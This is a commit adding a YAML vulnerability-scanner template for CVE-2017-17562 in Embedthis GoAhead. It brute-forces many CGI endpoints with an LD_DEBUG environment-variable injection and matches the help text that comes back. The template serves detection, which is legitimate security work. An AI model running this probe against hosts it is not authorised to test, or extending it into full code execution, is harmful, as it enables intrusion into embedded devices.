Create CVE-2017-17562.yaml

WIP
2021-03-27 21:22:33 +00:00 · 2021-03-27 21:22:33 +00:00 · 7b3c6c12a6
parent cabf16648e
commit 7b3c6c12a6
1 changed files with 101 additions and 0 deletions
--- a/cves/2017/CVE-2017-17562.yaml
+++ b/cves/2017/CVE-2017-17562.yaml
@ -0,0 +1,101 @@
+id: CVE-2017-17562
+
+info:
+  name: Embedthis GoAhead RCE
+  description: Embedthis GoAhead before 3.6.5 allows remote code execution if CGI is enabled and a CGI program is dynamically linked.
+  author: geeknik
+  reference:
+    - https://www.elttam.com/blog/goahead/
+    - https://github.com/ivanitlearning/CVE-2017-17562
+  severity: high
+  tags: cve,cve2017,rce,embedthis,goahead
+
+requests:
+  - payloads:
+      path:
+        - /
+        - /cgi-bin/
+        - /cgi/
+      endpoint:
+        - admin
+        - apply
+        - non-CA-rev
+        - cgitest
+        - checkCookie
+        - check_user
+        - chn/liveView
+        - cht/liveView
+        - cnswebserver
+        - config
+        - configure/set_link_neg
+        - configure/swports_adjust
+        - eng/liveView
+        - firmware
+        - getCheckCode
+        - get_status
+        - getmac
+        - getparam
+        - guest/Login
+        - home
+        - htmlmgr
+        - index
+        - index/login
+        - jscript
+        - kvm
+        - liveView
+        - login
+        - login.asp
+        - login/login
+        - login/login-page
+        - login_mgr
+        - luci
+        - main
+        - main-cgi
+        - manage/login
+        - menu
+        - mlogin
+        - netbinary
+        - nobody/Captcha
+        - nobody/VerifyCode
+        - normal_userLogin
+        - otgw
+        - page
+        - rulectl
+        - service
+        - set_new_config
+        - sl_webviewer
+        - ssi
+        - status
+        - sysconf
+        - systemutil
+        - t/out
+        - top
+        - unauth
+        - upload
+        - variable
+        - wanstatu
+        - webcm
+        - webmain
+        - webproc
+        - webscr
+        - webviewLogin
+        - webviewLogin_m64
+        - webviewer
+        - welcome
+    raw:
+      - |
+        POST §path§§endpoint§?LD_DEBUG=help%20cat HTTP/1.1
+        Host: {{Hostname}}
+        User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)
+        Accept: */*
+        Connection: close
+
+    attack: clusterbomb
+    matchers-condition: and
+    matchers:
+      - type: status
+        status:
+          - 200
+      - type: word
+        words:
+          - "Valid options for the LD_DEBUG environment variable are"